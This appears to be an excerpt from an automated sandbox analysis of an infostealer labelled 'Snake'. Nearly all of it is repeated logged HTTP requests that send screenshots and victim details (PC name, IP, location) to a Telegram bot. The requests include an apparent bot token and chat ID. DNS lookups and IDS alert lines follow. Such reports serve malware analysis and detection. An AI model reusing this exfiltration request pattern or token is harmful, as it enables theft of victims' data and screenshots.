                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5436e26a3730Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5508dcd0ab34Host: api.telegram.orgContent-Length: 706776Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd548fed14e72aHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd555e7355e4b6Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54cff9efdcf3Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd55c60fe897b7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd550d602b314fHost: api.telegram.orgContent-Length: 709461Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd562aeb8b0fe7Host: api.telegram.orgContent-Length: 715421Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd554f7cdd9e76Host: api.telegram.orgContent-Length: 709459Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5679ab174d43Host: api.telegram.orgContent-Length: 709459Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd56f87ad53487Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd55cd2163528fHost: api.telegram.orgContent-Length: 701024Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57431ae691f1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd560b448b0fcdHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57b525339f81Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd568ce8bef6b7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd581ad8e2c6beHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57020cab8d74Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5883ccbcdb5fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd57853a6ba14fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58f5e7576b22Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5806d8b754f1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd596ec7fc07e5Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd588331d88799Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6e942a613be0Host: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8de3a25a3cbc7d4Host: api.telegram.orgContent-Length: 708858Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58d44c277f5aHost: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd58da3ab36bd1Host: api.telegram.orgContent-Length: 708858
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8e3b0c96e1dafb8Host: api.telegram.orgContent-Length: 708858Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50d1d4aaecc3Host: api.telegram.orgContent-Length: 708858
Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50d1d548480cHost: api.telegram.orgContent-Length: 708858
Source: Joe Sandbox View | IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49720 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49730 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49740 -> 132.226.8.169:80
